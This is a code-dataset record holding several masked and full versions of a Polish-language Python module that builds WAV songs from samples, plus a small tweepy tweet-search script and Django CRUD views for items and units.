cwiercnuta[0:len(T[poczatek_cwiercnuty:\n poczatek_cwiercnuty + maksik])]\n else:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] += cwiercnuta\n T = np.array(T, dtype=np.int16)\n T = zmiana_glosnosci(T, loud)\n return T\n",
"step-3": "<mask token>\nprint('Laduje modul o nazwie: ' + __name__)\n<mask token>\n\n\ndef wczytywanie_ustawien(plik_konfiguracyjny='defs.txt'):\n \"\"\" \n wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika\n \n arg:\n str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi \n wartosciami parametrow (tempo itd.)\n \n wyjscie:\n dict: parametry - zapisane nazwy i wartosci uzywanych parametrow\n \n \"\"\"\n import re\n import numpy as np\n ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype=str, skip_header=\n 1, skip_footer=1, delimiter=':')\n parametry = {}\n if ustawienia.shape == (2,):\n parametry[re.sub('\"', '', ustawienia[0])] = ustawienia[1]\n else:\n for l in ustawienia:\n parametry[re.sub('\"', '', l[0])] = l[1]\n try:\n parametry['tryb'] = parametry['tryb'].strip()\n except KeyError:\n print('Podaj tryb odczytu!')\n try:\n parametry['bpm'] = int(parametry['bpm'])\n except KeyError:\n pass\n try:\n parametry['freq'] = int(parametry['freq'])\n except KeyError:\n pass\n try:\n parametry['loud'] = float(parametry['loud'])\n except KeyError:\n pass\n try:\n parametry['wages'] = [float(s) for s in parametry['wages'].split(',')]\n except KeyError:\n pass\n return parametry\n\n\ndef zmiana_glosnosci(utwor, procent=0):\n \"\"\"\n zmienia glosnosc utworu (jego amplitudy)\n \n arg:\n numpy.ndarray (numpy.int16): utwor - dzwiek, ktory ma byc zglosniony \n lub zciszony\n \n float: procent - liczba obrazujaca zmiane glosnosci utworu, osiaga \n wartosci od -1 do 1, dla 0 brak zmian, dla 1 - \"100% \n glosniej\", dla -1 \"100% ciszej\"\n \n wyjscie:\n numpy.ndarray (numpy.int16): glosniejszy -sciszony lub zglosniony utwor\n \"\"\"\n if -1 <= procent <= 1:\n mnoznik = 0\n if procent < 0:\n mnoznik = 1 + procent\n else:\n maks_ampli = 0\n maks_ampli = max(abs(utwor))\n mnoznik = 32767 / maks_ampli\n mnoznik = 1 + (mnoznik - 1) * procent\n glosniej = mnoznik * utwor\n glosniej = glosniej.astype(np.int16)\n return glosniej\n else:\n print('Podaj procent z zakresu -1 do 1')\n\n\ndef tworzenie_piosenki(macierz_piosenki, czy_pelna=True, bpm=120, freq=\n 44100, wages=None, loud=0):\n \"\"\"\n glowna funkcja generujaca cala piosenke\n \n arg:\n numpy.ndarray (str: U2): macierz_piosenki - macierz zawierajaca \n definicje kolejnych cwiercnut (co ma byc grane \n w danej cwiercnucie)\n \n bool: czy_pelna - zmienna sprawdzajaca czy macierz_piosenki jest \n zapisana (nie jest, gdy tracki mialy nieodpowiednia \n liczbe wierszy lub kolumn)\n \n int: bpm - tempo piosenki w jednostce bpm\n \n int: freq - ilosc probek w jednej sekundzie\n \n list (float): wages - wagi kolejnych sampli (jakie znaczenie ma miec 1 \n probka, 2 etc.)\n \n float: loud - procent glosnosci, 0 - tak jak oryginalne probki, 1 - na \n maxa, -1 - sciszamy na maxa\n \n wyjscie:\n numpy.ndarray (numpy.int16): gotowy utwór\n \n \"\"\"\n if czy_pelna == False:\n print('Nie utworzono piosenki')\n return None\n else:\n import numpy as np\n import scipy.io.wavfile\n t_cwiercnuty = 60 / bpm\n ile_cwiercnut = macierz_piosenki.shape[0]\n kanaly = macierz_piosenki.shape[1]\n frekw = freq\n czas_utworu = ile_cwiercnut * t_cwiercnuty\n ilosc_probek = int(frekw * czas_utworu)\n rozne_sample = np.unique(macierz_piosenki)\n sample_co = {}\n sample_frekw = {}\n sample_dl = {}\n for ktory_sampel in rozne_sample:\n if ktory_sampel != '--':\n plik = ''.join(['sample', ktory_sampel, '.wav'])\n sample_frekw[ktory_sampel], sample_co[ktory_sampel\n ] = scipy.io.wavfile.read(plik)\n sample_co[ktory_sampel] = np.mean(sample_co[ktory_sampel],\n 
axis=1) / 32767\n sample_co[ktory_sampel] = np.int16(sample_co[ktory_sampel] /\n max(np.abs(sample_co[ktory_sampel])) * 32767)\n sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]\n else:\n sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16)\n sample_frekw[ktory_sampel] = frekw\n sample_dl[ktory_sampel] = 0\n if wages is None:\n wages = np.ones((1, kanaly))\n else:\n wages = np.array(wages).reshape(1, kanaly)\n T = np.linspace(0, czas_utworu, ilosc_probek)\n for wiersz in range(0, ile_cwiercnut):\n sample = []\n dlugosci = []\n for i in range(0, kanaly):\n sampus = macierz_piosenki[wiersz, i]\n sample.append(sample_co[sampus])\n dlugosci.append(sample_dl[sampus])\n maksik = max(dlugosci)\n pusty = np.int16(np.zeros((len(sample), maksik)))\n for k in range(0, kanaly):\n pusty[k][0:dlugosci[k]] = sample[k]\n cwiercnuta = np.dot(wages, pusty)\n cwiercnuta = cwiercnuta[0]\n poczatek_cwiercnuty = int(wiersz * t_cwiercnuty * frekw)\n if poczatek_cwiercnuty + maksik > ilosc_probek:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] = cwiercnuta[0:len(T[poczatek_cwiercnuty:\n poczatek_cwiercnuty + maksik])]\n else:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] += cwiercnuta\n T = np.array(T, dtype=np.int16)\n T = zmiana_glosnosci(T, loud)\n return T\n",
"step-4": "<mask token>\nprint('Laduje modul o nazwie: ' + __name__)\nimport numpy as np\n\n\ndef wczytywanie_ustawien(plik_konfiguracyjny='defs.txt'):\n \"\"\" \n wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika\n \n arg:\n str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi \n wartosciami parametrow (tempo itd.)\n \n wyjscie:\n dict: parametry - zapisane nazwy i wartosci uzywanych parametrow\n \n \"\"\"\n import re\n import numpy as np\n ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype=str, skip_header=\n 1, skip_footer=1, delimiter=':')\n parametry = {}\n if ustawienia.shape == (2,):\n parametry[re.sub('\"', '', ustawienia[0])] = ustawienia[1]\n else:\n for l in ustawienia:\n parametry[re.sub('\"', '', l[0])] = l[1]\n try:\n parametry['tryb'] = parametry['tryb'].strip()\n except KeyError:\n print('Podaj tryb odczytu!')\n try:\n parametry['bpm'] = int(parametry['bpm'])\n except KeyError:\n pass\n try:\n parametry['freq'] = int(parametry['freq'])\n except KeyError:\n pass\n try:\n parametry['loud'] = float(parametry['loud'])\n except KeyError:\n pass\n try:\n parametry['wages'] = [float(s) for s in parametry['wages'].split(',')]\n except KeyError:\n pass\n return parametry\n\n\ndef zmiana_glosnosci(utwor, procent=0):\n \"\"\"\n zmienia glosnosc utworu (jego amplitudy)\n \n arg:\n numpy.ndarray (numpy.int16): utwor - dzwiek, ktory ma byc zglosniony \n lub zciszony\n \n float: procent - liczba obrazujaca zmiane glosnosci utworu, osiaga \n wartosci od -1 do 1, dla 0 brak zmian, dla 1 - \"100% \n glosniej\", dla -1 \"100% ciszej\"\n \n wyjscie:\n numpy.ndarray (numpy.int16): glosniejszy -sciszony lub zglosniony utwor\n \"\"\"\n if -1 <= procent <= 1:\n mnoznik = 0\n if procent < 0:\n mnoznik = 1 + procent\n else:\n maks_ampli = 0\n maks_ampli = max(abs(utwor))\n mnoznik = 32767 / maks_ampli\n mnoznik = 1 + (mnoznik - 1) * procent\n glosniej = mnoznik * utwor\n glosniej = glosniej.astype(np.int16)\n return glosniej\n else:\n print('Podaj procent z zakresu -1 do 1')\n\n\ndef tworzenie_piosenki(macierz_piosenki, czy_pelna=True, bpm=120, freq=\n 44100, wages=None, loud=0):\n \"\"\"\n glowna funkcja generujaca cala piosenke\n \n arg:\n numpy.ndarray (str: U2): macierz_piosenki - macierz zawierajaca \n definicje kolejnych cwiercnut (co ma byc grane \n w danej cwiercnucie)\n \n bool: czy_pelna - zmienna sprawdzajaca czy macierz_piosenki jest \n zapisana (nie jest, gdy tracki mialy nieodpowiednia \n liczbe wierszy lub kolumn)\n \n int: bpm - tempo piosenki w jednostce bpm\n \n int: freq - ilosc probek w jednej sekundzie\n \n list (float): wages - wagi kolejnych sampli (jakie znaczenie ma miec 1 \n probka, 2 etc.)\n \n float: loud - procent glosnosci, 0 - tak jak oryginalne probki, 1 - na \n maxa, -1 - sciszamy na maxa\n \n wyjscie:\n numpy.ndarray (numpy.int16): gotowy utwór\n \n \"\"\"\n if czy_pelna == False:\n print('Nie utworzono piosenki')\n return None\n else:\n import numpy as np\n import scipy.io.wavfile\n t_cwiercnuty = 60 / bpm\n ile_cwiercnut = macierz_piosenki.shape[0]\n kanaly = macierz_piosenki.shape[1]\n frekw = freq\n czas_utworu = ile_cwiercnut * t_cwiercnuty\n ilosc_probek = int(frekw * czas_utworu)\n rozne_sample = np.unique(macierz_piosenki)\n sample_co = {}\n sample_frekw = {}\n sample_dl = {}\n for ktory_sampel in rozne_sample:\n if ktory_sampel != '--':\n plik = ''.join(['sample', ktory_sampel, '.wav'])\n sample_frekw[ktory_sampel], sample_co[ktory_sampel\n ] = scipy.io.wavfile.read(plik)\n sample_co[ktory_sampel] = 
np.mean(sample_co[ktory_sampel],\n axis=1) / 32767\n sample_co[ktory_sampel] = np.int16(sample_co[ktory_sampel] /\n max(np.abs(sample_co[ktory_sampel])) * 32767)\n sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]\n else:\n sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16)\n sample_frekw[ktory_sampel] = frekw\n sample_dl[ktory_sampel] = 0\n if wages is None:\n wages = np.ones((1, kanaly))\n else:\n wages = np.array(wages).reshape(1, kanaly)\n T = np.linspace(0, czas_utworu, ilosc_probek)\n for wiersz in range(0, ile_cwiercnut):\n sample = []\n dlugosci = []\n for i in range(0, kanaly):\n sampus = macierz_piosenki[wiersz, i]\n sample.append(sample_co[sampus])\n dlugosci.append(sample_dl[sampus])\n maksik = max(dlugosci)\n pusty = np.int16(np.zeros((len(sample), maksik)))\n for k in range(0, kanaly):\n pusty[k][0:dlugosci[k]] = sample[k]\n cwiercnuta = np.dot(wages, pusty)\n cwiercnuta = cwiercnuta[0]\n poczatek_cwiercnuty = int(wiersz * t_cwiercnuty * frekw)\n if poczatek_cwiercnuty + maksik > ilosc_probek:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] = cwiercnuta[0:len(T[poczatek_cwiercnuty:\n poczatek_cwiercnuty + maksik])]\n else:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] += cwiercnuta\n T = np.array(T, dtype=np.int16)\n T = zmiana_glosnosci(T, loud)\n return T\n",
"step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nModul do zapisu piosenki (wczytywanie ustawien (defs.txt), tworzenie .wav,\r\n \"zglasnianie utworu\")\r\n\"\"\"\r\n\r\n\r\nprint(\"Laduje modul o nazwie: \"+__name__)\r\n\r\nimport numpy as np\r\n\r\ndef wczytywanie_ustawien(plik_konfiguracyjny = \"defs.txt\"):\r\n \"\"\" \r\n wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika\r\n \r\n arg:\r\n str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi \r\n wartosciami parametrow (tempo itd.)\r\n \r\n wyjscie:\r\n dict: parametry - zapisane nazwy i wartosci uzywanych parametrow\r\n \r\n \"\"\"\r\n import re\r\n import numpy as np\r\n \r\n # wczytuje zawartosc pliku (bez pierwszej i ostatniej linijki, jeden wiersz \r\n # wyjsciowej macierzy, zawiera nazwe parametru i jego wartosc, jako \r\n # oddzielne elementy, zapisane jako stringi)\r\n ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype = str, \\\r\n skip_header=1, skip_footer=1, delimiter=\":\")\r\n \r\n # tworze slownik, ktory bedzie przechowywal wartosci\r\n parametry = {}\r\n \r\n # pozbywam się \"\" z key\r\n \r\n # jesli mamy 1 parametr (1 linijka w pliku, to ustawienia to zmienna o \r\n # shape = (2,), wiec odwoluje sie bezposrednio do zmiennej ustawienia\r\n if ustawienia.shape == (2,): \r\n parametry[re.sub('\"','',ustawienia[0])] = ustawienia[1]\r\n # jak mamy wiecej parametrow odwoluje sie do kolejnych linijek macierzy \r\n # ustawienia\r\n else:\r\n for l in ustawienia: \r\n parametry[re.sub('\"','',l[0])] = l[1]\r\n \r\n # zamieniamy napisy na odpowiednie wartosci - kontroluje te parametry, wiec\r\n # robie to recznie\r\n \r\n try:\r\n parametry['tryb'] = parametry['tryb'].strip() #tryb\r\n # jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu\r\n except KeyError:\r\n print(\"Podaj tryb odczytu!\")\r\n try:\r\n parametry['bpm'] = int(parametry['bpm']) # tempo\r\n # jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu\r\n except KeyError:\r\n pass\r\n try:\r\n parametry['freq'] = int(parametry['freq']) # frekwencja wyjsciowego wav\r\n # jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu\r\n except KeyError:\r\n pass\r\n try:\r\n parametry['loud'] = float(parametry['loud'] ) # glosnosc\r\n # jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu\r\n except KeyError:\r\n pass\r\n try:\r\n # lista wag dla sampli\r\n parametry['wages'] = [float(s) for s in parametry['wages'].split(\",\")] \r\n # jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu\r\n except KeyError:\r\n pass\r\n \r\n return parametry\r\n \r\n#b = wczytywanie_ustawien(\"defs.txt\")\r\n \r\n \r\n#zglasnianie utworu\r\n\r\ndef zmiana_glosnosci(utwor, procent = 0):\r\n \"\"\"\r\n zmienia glosnosc utworu (jego amplitudy)\r\n \r\n arg:\r\n numpy.ndarray (numpy.int16): utwor - dzwiek, ktory ma byc zglosniony \r\n lub zciszony\r\n \r\n float: procent - liczba obrazujaca zmiane glosnosci utworu, osiaga \r\n wartosci od -1 do 1, dla 0 brak zmian, dla 1 - \"100% \r\n glosniej\", dla -1 \"100% ciszej\"\r\n \r\n wyjscie:\r\n numpy.ndarray (numpy.int16): glosniejszy -sciszony lub zglosniony utwor\r\n \"\"\"\r\n if(-1 <= procent <= 1):\r\n #ile razy mamy pomnozyc amplitude naszego dzwieku\r\n mnoznik = 0\r\n if( procent < 0 ):\r\n mnoznik = 1 + procent\r\n else:\r\n # obliczamy najwyzsza amplitude w danym utworze i ona bedzie \r\n # wyznaczac jak bardzo mozemy podglosnic\r\n maks_ampli = 0\r\n maks_ampli = max(abs(utwor))\r\n mnoznik = 32767/maks_ampli # maksymalny mnoznik\r\n # mnoznik minimalnie 
moze osiagnac wartosc 1, to co powyzej \r\n # (mnoznik-1) mnozymy o procent zglosnienia\r\n # i dodajemy do podstawy (czyli 1)\r\n mnoznik = 1 + (mnoznik - 1)*procent\r\n glosniej = mnoznik * utwor\r\n #glosniej = np.array(glosniej, dtype=np.int16)\r\n glosniej = glosniej.astype(np.int16) \r\n return glosniej\r\n else:\r\n print(\"Podaj procent z zakresu -1 do 1\")\r\n \r\n\r\n#wierszyk1 = zmiana_glosnosci(wierszyk, b['loud'])\r\n#wierszyk1\r\n \r\n \r\n \r\n\r\ndef tworzenie_piosenki(macierz_piosenki, czy_pelna = True, bpm = 120, \\\r\n freq = 44100, wages = None, loud = 0):\r\n \"\"\"\r\n glowna funkcja generujaca cala piosenke\r\n \r\n arg:\r\n numpy.ndarray (str: U2): macierz_piosenki - macierz zawierajaca \r\n definicje kolejnych cwiercnut (co ma byc grane \r\n w danej cwiercnucie)\r\n \r\n bool: czy_pelna - zmienna sprawdzajaca czy macierz_piosenki jest \r\n zapisana (nie jest, gdy tracki mialy nieodpowiednia \r\n liczbe wierszy lub kolumn)\r\n \r\n int: bpm - tempo piosenki w jednostce bpm\r\n \r\n int: freq - ilosc probek w jednej sekundzie\r\n \r\n list (float): wages - wagi kolejnych sampli (jakie znaczenie ma miec 1 \r\n probka, 2 etc.)\r\n \r\n float: loud - procent glosnosci, 0 - tak jak oryginalne probki, 1 - na \r\n maxa, -1 - sciszamy na maxa\r\n \r\n wyjscie:\r\n numpy.ndarray (numpy.int16): gotowy utwór\r\n \r\n \"\"\"\r\n \r\n \r\n # macierz piosenki byla pusta, piosenka nie zostala utworzona\r\n if(czy_pelna == False):\r\n print(\"Nie utworzono piosenki\")\r\n return None \r\n \r\n else:\r\n \r\n import numpy as np\r\n import scipy.io.wavfile\r\n \r\n t_cwiercnuty = 60 / bpm # czas trwania jednej cwiercnuty (zalezy od \r\n #tempa)\r\n ile_cwiercnut = macierz_piosenki.shape[0] # ilosc cwiercnut\r\n kanaly = macierz_piosenki.shape[1] # ilosc uzywanych sampli\r\n frekw = freq\r\n czas_utworu = ile_cwiercnut*t_cwiercnuty\r\n # ile elementow bedzie w nowym utworze\r\n ilosc_probek = int(frekw*czas_utworu) \r\n \r\n # bedziemy tylko raz wczytywac zawartosc sampleXY.wav, wiec potrzebuje \r\n # unikalne numery sampli\r\n rozne_sample = np.unique(macierz_piosenki) # bierze lacznie z \"--\"\r\n \r\n # w slownikach zapiszemy parametry tych sampli\r\n # slownik z wartosciami danego sampla (tj. macierze numpy-owe z \r\n # amplitudami)\r\n sample_co = {} \r\n sample_frekw = {} # slownik z ich frekwencjami\r\n sample_dl = {} # slownik z ich dlugosciami\r\n \r\n #wczytujemy te sample\r\n # w iteratorze bierzemy napisy \"01\" \"02\" \"--\" itd. stringi!!!\r\n for ktory_sampel in rozne_sample: \r\n \r\n if(ktory_sampel != '--'):\r\n # tworzymy napis z nazwa pliku sampla, np. 
\"sample01.wav\"\r\n plik = ''.join(['sample',ktory_sampel,'.wav'])\r\n # wczytujemy zawartosc i frekwencje danego sampla do \r\n # odpowiednio nazwanego elementu w slowniku sample_co i \r\n # sample_frekw\r\n sample_frekw[ktory_sampel], sample_co[ktory_sampel] = \\\r\n scipy.io.wavfile.read(plik)\r\n # tworzymy mono z naszego sampla\r\n sample_co[ktory_sampel] = np.mean(sample_co[ktory_sampel],\\\r\n axis=1)/32767\r\n # normalizujemy te wartosci\r\n sample_co[ktory_sampel] = np.int16(sample_co[ktory_sampel]/ \\\r\n max(np.abs(sample_co[ktory_sampel])) * 32767)\r\n # zapisujemy dlugosc sampli, czyli ilosc probek \r\n # ( = czas_trwania*frekwencja)\r\n sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]\r\n \r\n else: # to samo robimy dla \"--\" recznie ustawiamy\r\n # robimy cisze, gdy --\r\n sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16) \r\n sample_frekw[ktory_sampel] = frekw # taka sama jak domyslna\r\n sample_dl[ktory_sampel] = 0 # zakladamy czas 0 sekund\r\n \r\n\r\n \r\n \r\n \r\n if wages is None:\r\n wages = np.ones((1,kanaly)) \r\n else:\r\n # zeby mialo wymiar (1,kanaly), a nie (kanaly,)\r\n wages = np.array(wages).reshape(1,kanaly) \r\n \r\n # definicja nowego utworu\r\n T = np.linspace(0, czas_utworu, ilosc_probek)\r\n \r\n for wiersz in range(0, ile_cwiercnut):\r\n\r\n sample = [] # wczytamy sample z danej cwiecnuty\r\n dlugosci = [] # tu zapiszemy ich dlugosci w tej cwiercnucie\r\n\r\n for i in range(0, kanaly):\r\n \r\n sampus = macierz_piosenki[wiersz,i]\r\n sample.append(sample_co[sampus]) \r\n dlugosci.append(sample_dl[sampus])\r\n\r\n \r\n # bierzemy najdluzszy sample i w calosci bedziemy go odtwarzac; \r\n # reszte zatem tez w calosci odtworzymy, a gdy sie skoncza damy \r\n # cisze (zera)\r\n maksik = max(dlugosci)\r\n # mamy tutaj macierz 4 na max dlugosc, przygotowana do zlaczenia \r\n # potem tych dzwiekow w jeden \r\n pusty = np.int16(np.zeros((len(sample), maksik)))\r\n\r\n # dodajemy nasze dzwieki do tej pustej\r\n for k in range(0, kanaly):\r\n pusty[k][0:dlugosci[k]] = sample[k]\r\n\r\n \r\n # mnozymy kolejne elementy wektora pusty (czyli sample) przez \r\n # wagi i sumujemy\r\n cwiercnuta = np.dot(wages, pusty) \r\n #otrzymamy wymiar (1, x), a chcemy (x,), wiec bierzemy pierwszy \r\n # element\r\n cwiercnuta = cwiercnuta[0]\r\n \r\n # poczatek biezacej cwiercnuty \r\n poczatek_cwiercnuty = int(wiersz*t_cwiercnuty*frekw)\r\n \r\n # jesli dodanie ostatnich cwiercnut bedzie wiazalo sie z \r\n # przekroczeniem dlugosci tworzonego utworu, obcinamy ostatnie \r\n # dzwieki, tak by zmiescic sie w tej dlugosci\r\n if (poczatek_cwiercnuty + maksik) > ilosc_probek:\r\n \r\n T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)]=\\\r\n cwiercnuta[0:len(T[poczatek_cwiercnuty:(poczatek_cwiercnuty +\\\r\n maksik)])]\r\n \r\n else:\r\n T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)] += \\\r\n cwiercnuta\r\n \r\n T= np.array(T, dtype=np.int16)\r\n \r\n #ustalamy glosnosc utworu\r\n T = zmiana_glosnosci(T, loud)\r\n\r\n return T\r\n\r\n#pios, k = wczytywanie_sciezek(a)\r\n#wierszyk = tworzenie_piosenki(pios, k, bpm = b['bpm'], freq = b['freq'], \\\r\n#wages = b['wages'])\r\n#wierszyk = tworzenie_piosenki(pios, k, **b)\r\n#wierszyk ",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import tweepy
import time
import twitter_credentials as TC
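# Authenticate with the Twitter API using the consumer and access tokens
# stored in the twitter_credentials module.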
auth = tweepy.OAuthHandler(TC.CONSUMER_KEY, TC.CONSUMER_SECRET)
auth.set_access_token(TC.ACCESS_TOKEN, TC.ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
count = 1
# Query to get 50 tweets with either Indiana or Weather in them
for tweet in tweepy.Cursor(api.search, q = "Indiana OR Weather").items(50):
print(str(count) +". "+ tweet.text)
count+=1
|
normal
|
{
"blob_id": "4da1a97c2144c9aaf96e5fe6508f8b4532b082d4",
"index": 7861,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nauth.set_access_token(TC.ACCESS_TOKEN, TC.ACCESS_TOKEN_SECRET)\n<mask token>\nfor tweet in tweepy.Cursor(api.search, q='Indiana OR Weather').items(50):\n print(str(count) + '. ' + tweet.text)\n count += 1\n",
"step-3": "<mask token>\nauth = tweepy.OAuthHandler(TC.CONSUMER_KEY, TC.CONSUMER_SECRET)\nauth.set_access_token(TC.ACCESS_TOKEN, TC.ACCESS_TOKEN_SECRET)\napi = tweepy.API(auth)\ncount = 1\nfor tweet in tweepy.Cursor(api.search, q='Indiana OR Weather').items(50):\n print(str(count) + '. ' + tweet.text)\n count += 1\n",
"step-4": "import tweepy\nimport time\nimport twitter_credentials as TC\nauth = tweepy.OAuthHandler(TC.CONSUMER_KEY, TC.CONSUMER_SECRET)\nauth.set_access_token(TC.ACCESS_TOKEN, TC.ACCESS_TOKEN_SECRET)\napi = tweepy.API(auth)\ncount = 1\nfor tweet in tweepy.Cursor(api.search, q='Indiana OR Weather').items(50):\n print(str(count) + '. ' + tweet.text)\n count += 1\n",
"step-5": "import tweepy\nimport time\nimport twitter_credentials as TC\n\nauth = tweepy.OAuthHandler(TC.CONSUMER_KEY, TC.CONSUMER_SECRET)\nauth.set_access_token(TC.ACCESS_TOKEN, TC.ACCESS_TOKEN_SECRET)\n\napi = tweepy.API(auth)\ncount = 1\n\n# Query to get 50 tweets with either Indiana or Weather in them\nfor tweet in tweepy.Cursor(api.search, q = \"Indiana OR Weather\").items(50):\n print(str(count) +\". \"+ tweet.text)\n count+=1\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.shortcuts import render, redirect
# Create your views here.
from item.models import Item, Unit
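# List/add/edit/delete views for Item and Unit records.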
def str_to_bool(s):
return True if s.lower() == 'true' else False
def item(request):
if not request.session.get('is_login', None):
return redirect('/item/item')
else:
item_list = Item.objects.all()
return render(request, 'item/item.html', locals())
def add_item(request):
if request.method == 'GET':
last_item_info = Item.objects.last()
unit_list=Unit.objects.all()
return render(request, 'item/add_item.html', locals())
else:
item_index = request.POST.get('item_index')
item_chinese_name = request.POST.get('item_chinese_name')
item_english_name = request.POST.get('item_english_name')
item_method = request.POST.get('item_method')
item_unit = request.POST.get('item_unit')
is_calc = request.POST.get('is_calc')
is_use = request.POST.get('is_use')
unit_info=Unit.objects.get(id=item_unit)
new_item = Item(item_index=int(item_index), item_chinese_name=item_chinese_name,
item_english_name=item_english_name,item_method=item_method,item_unit=unit_info,is_calc=str_to_bool(is_calc),
is_use=str_to_bool(is_use))
new_item.save()
return redirect('/item/item/')
def edit_item(request):
if request.method == 'GET':
nid = request.GET.get('nid')
item_info = Item.objects.get(id=nid)
unit_list = Unit.objects.all()
return render(request, 'item/edit_item.html', locals())
else:
nid = request.GET.get('nid')
item_index = request.POST.get('item_index')
item_chinese_name = request.POST.get('item_chinese_name')
item_english_name = request.POST.get('item_english_name')
item_method = request.POST.get('item_method')
item_unit = request.POST.get('item_unit')
is_calc = request.POST.get('is_calc')
is_use = request.POST.get('is_use')
unit_info = Unit.objects.get(id=item_unit)
item_info = Item.objects.get(id=nid)
item_info.item_index = item_index
item_info.item_chinese_name = item_chinese_name
item_info.item_english_name = item_english_name
item_info.item_method = item_method
item_info.item_unit = unit_info
item_info.is_calc = str_to_bool(is_calc)
item_info.is_use = str_to_bool(is_use)
item_info.save()
return redirect('/item/item/')
def del_item(request):
nid = request.GET.get('nid')
    item_info = Item.objects.filter(id=nid)
item_info.delete()
return redirect('/item/item/')
def unit(request):
if not request.session.get('is_login', None):
return redirect('/item/unit')
else:
unit_list = Unit.objects.all()
return render(request, 'item/unit.html', locals())
def add_unit(request):
if request.method == 'GET':
last_unit_info = Unit.objects.last()
return render(request, 'item/add_unit.html', locals())
else:
unit_index = request.POST.get('unit_index')
unit_name = request.POST.get('unit_name')
new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name,)
new_unit.save()
return redirect('/item/unit/')
def edit_unit(request):
if request.method == 'GET':
nid = request.GET.get('nid')
unit_info = Unit.objects.get(id=nid)
return render(request, 'item/edit_unit.html', locals())
else:
nid = request.GET.get('nid')
unit_index = request.POST.get('unit_index')
unit_name = request.POST.get('unit_name')
unit_info = Unit.objects.get(id=nid)
unit_info.unit_index = unit_index
unit_info.unit_name = unit_name
unit_info.save()
return redirect('/item/unit/')
def del_unit(request):
nid = request.GET.get('nid')
unit_info = Unit.objects.filter(id=nid)
unit_info.delete()
return redirect('/item/unit/')
|
normal
|
{
"blob_id": "22b2ebdbb48caa593bece030d238089a0aa27053",
"index": 1983,
"step-1": "<mask token>\n\n\ndef item(request):\n if not request.session.get('is_login', None):\n return redirect('/item/item')\n else:\n item_list = Item.objects.all()\n return render(request, 'item/item.html', locals())\n\n\n<mask token>\n\n\ndef add_unit(request):\n if request.method == 'GET':\n last_unit_info = Unit.objects.last()\n return render(request, 'item/add_unit.html', locals())\n else:\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name)\n new_unit.save()\n return redirect('/item/unit/')\n\n\ndef edit_unit(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n unit_info = Unit.objects.get(id=nid)\n return render(request, 'item/edit_unit.html', locals())\n else:\n nid = request.GET.get('nid')\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n unit_info = Unit.objects.get(id=nid)\n unit_info.unit_index = unit_index\n unit_info.unit_name = unit_name\n unit_info.save()\n return redirect('/item/unit/')\n\n\ndef del_unit(request):\n nid = request.GET.get('nid')\n unit_info = Unit.objects.filter(id=nid)\n unit_info.delete()\n return redirect('/item/unit/')\n",
"step-2": "<mask token>\n\n\ndef item(request):\n if not request.session.get('is_login', None):\n return redirect('/item/item')\n else:\n item_list = Item.objects.all()\n return render(request, 'item/item.html', locals())\n\n\n<mask token>\n\n\ndef edit_item(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n item_info = Item.objects.get(id=nid)\n unit_list = Unit.objects.all()\n return render(request, 'item/edit_item.html', locals())\n else:\n nid = request.GET.get('nid')\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n unit_info = Unit.objects.get(id=item_unit)\n item_info = Item.objects.get(id=nid)\n item_info.item_index = item_index\n item_info.item_chinese_name = item_chinese_name\n item_info.item_english_name = item_english_name\n item_info.item_method = item_method\n item_info.item_unit = unit_info\n item_info.is_calc = str_to_bool(is_calc)\n item_info.is_use = str_to_bool(is_use)\n item_info.save()\n return redirect('/item/item/')\n\n\n<mask token>\n\n\ndef add_unit(request):\n if request.method == 'GET':\n last_unit_info = Unit.objects.last()\n return render(request, 'item/add_unit.html', locals())\n else:\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name)\n new_unit.save()\n return redirect('/item/unit/')\n\n\ndef edit_unit(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n unit_info = Unit.objects.get(id=nid)\n return render(request, 'item/edit_unit.html', locals())\n else:\n nid = request.GET.get('nid')\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n unit_info = Unit.objects.get(id=nid)\n unit_info.unit_index = unit_index\n unit_info.unit_name = unit_name\n 